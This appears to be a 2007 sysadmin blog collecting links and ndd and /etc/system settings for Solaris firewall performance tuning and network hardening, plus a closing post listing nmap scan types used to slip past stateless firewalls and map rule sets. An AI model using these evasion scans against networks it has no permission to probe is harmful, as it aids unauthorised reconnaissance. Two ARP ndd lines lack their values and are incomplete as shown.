http://www.checkpoint.com/techsupport/documentation/FW-1_VPN-1_performance.html

This guide combines the Solaris performance and security tuning guides, but focuses specifically on the settings that affect your firewall performance.

Settings like:
  • Tuning the STREAMS queues for high-throughput VPN-1 gateways
    • set sq_max_size = 100 (for a Solaris gateway with 256MB RAM)
  • Tuning the TCP hiwater parameters for maximal throughput
    • ndd -set /dev/tcp tcp_xmit_hiwat 65535 (default 8192)
    • ndd -set /dev/tcp tcp_recv_hiwat 65535 (default 8192)
  • Tuning the TCP Slow Start and TCP queue sizes
    • set tcp:tcp_conn_hash_size = 16384
    • ndd -set /dev/tcp tcp_slow_start_initial 2 (default 1)
    • ndd -set /dev/tcp tcp_conn_req_max_q 1024 (default 128)
    • ndd -set /dev/tcp tcp_conn_req_max_q0 4096 (default 1024)
    • ndd -set /dev/tcp tcp_time_wait_interval 60000 (default 240000)

Netscreen Basics

Here is the link:
http://www.juniper.net/techpubs/software/erx/junose61/swconfig-system-basics/frameset.htm

This is everything you wanted to know about managing netscreen firewalls. Sadly it's in PDFs which make it a hassle, but this/these are the guides you want:
  • CLI guide
  • Writing CLI Macros
  • HA guide
  • Packet Mirroring
  • Logging System Events (Includes event descriptions)
You can either open/download the individual PDFs or download the entire guide as one large PDF:
http://www.juniper.net/techpubs/software/erx/junose61/bookpdfs/swconfig-system-basics.pdf

Saturday, February 03, 2007

Solaris System Tuning

Here is Sun's guide to tuning Solaris:
http://docs.sun.com/app/docs/doc/806-7009/6jftnqsiu?a=view

The most important thing to remember here is:

Make a copy of /etc/system before modifying it so you can easily recover from an incorrect value:
# cp /etc/system /etc/system.good

If a value entered in /etc/system causes the system to become unbootable, you can recover with the following command:
# boot -a

This command causes the system to ask for the name of various files used in the boot process. Press the carriage return to accept the default values until the name of the /etc/system file is requested. When the Name of system file [/etc/system]: prompt is displayed, enter the name of the good /etc/system file or /dev/null.

If /dev/null is entered, this path causes the system to attempt to read from /dev/null for its configuration information and because it is empty, the system uses the default values. After the system is booted, the /etc/system file can be corrected.

The guide will explain the different tunables, how to check performance, and when to change the settings.

Solaris: Kernel Tuning for Security

The guide is here:
http://www.securityfocus.com/infocus/1385

This is specifically about tuning your network settings to prevent network-based attacks. For example:

Worried about ARP attacks?

# ndd -set /dev/arp arp_cleanup_interval
# ndd -set /dev/ip ip_ire_flush_interval

How about IP forwarding or SRC routing:

# ndd -set /dev/ip ip_forwarding 0
# ndd -set /dev/ip ip_strict_dst_multihoming 0

# ndd -set /dev/ip ip_forward_directed_broadcasts 0
# ndd -set /dev/ip ip_forward_src_routed 0

How about SYN floods? First you need to get a baseline of SYNs. Either of these commands will do:

# netstat -an -f inet | grep SYN_RCVD | wc -l
# netstat -s -P tcp

Then you need to read the guide

NMAP: More port scanning techniques

This is the guide to nmap: http://searchsecurity.techtarget.com/tip/0,289483,sid14_gci1195745,00.html

Explains how to use Nmap's:

TCP Null (option -sN), FIN (option -sF) and Xmas (option -sX) scans to get through non-stateful firewalls and packet filtering routers.

IPID Idle scan (option -sI) to map out IP-based trust relationships between machines, and get through firewalls.

TCP ACK scan (option -sA), to help map out firewall rule sets.

As well as many other ways to test firewall configurations.